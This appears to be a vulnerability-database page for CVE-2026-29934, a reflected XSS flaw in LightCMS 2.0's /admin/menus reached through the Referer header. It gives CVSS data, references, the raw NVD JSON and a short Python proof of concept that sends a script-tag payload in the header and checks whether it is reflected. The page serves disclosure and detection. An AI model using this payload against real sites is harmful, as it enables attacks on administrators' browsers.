CVE-2026-29934

Description

A reflected cross-site scripting (XSS) vulnerability in the /admin/menus component of Lightcms v2.0 allows attackers to execute arbitrary Javascript in the context of the user's browser via modifying the referer value in the request header.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:lightcms_project:lightcms:2.0:*:*:*:*:*:*:* - VULNERABLE

Lightcms 2.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL containing the vulnerable component
target_url = "http://target-host.com/admin/menus"

# Malicious JavaScript payload to be injected via the Referer header
xss_payload = "<script>alert('CVE-2026-29934_XSS');</script>"

# Prepare headers with the injected payload
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) PoC-Scanner",
    "Referer": xss_payload
}

try:
    # Send the GET request to the vulnerable endpoint
    response = requests.get(target_url, headers=headers, timeout=10)

    # Check if the payload is reflected unfiltered in the response body
    if xss_payload in response.text:
        print("[+] Vulnerability Confirmed: The payload was reflected in the response.")
    else:
        print("[-] Vulnerability Not Detected: Payload not found or encoded.")

except requests.exceptions.RequestException as e:
    print(f"[!] Error connecting to target: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-29934
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-29934
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-29934/
[4] VulDB https://vuldb.com/cve/CVE-2026-29934
[5] https://github.com/eddy8/LightCMS/issues/38

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-29934", "sourceIdentifier": "[email protected]", "published": "2026-03-26T15:16:36.017", "lastModified": "2026-05-10T14:16:49.260", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A reflected cross-site scripting (XSS) vulnerability in the /admin/menus component of Lightcms v2.0 allows attackers to execute arbitrary Javascript in the context of the user's browser via modifying the referer value in the request header."}, {"lang": "es", "value": "Una vulnerabilidad de cross-site scripting (XSS) reflejada en el componente /admin/menus de Lightcms v2.0 permite a los atacantes ejecutar Javascript arbitrario en el contexto del navegador del usuario mediante la modificación del valor del referer en la cabecera de la solicitud."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lightcms_project:lightcms:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "188FCA72-D81E-48AA-8C49-58CB4BCD877F"}]}]}], "references": [{"url": "https://github.com/eddy8/LightCMS/issues/38", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Mitigation"]}]}}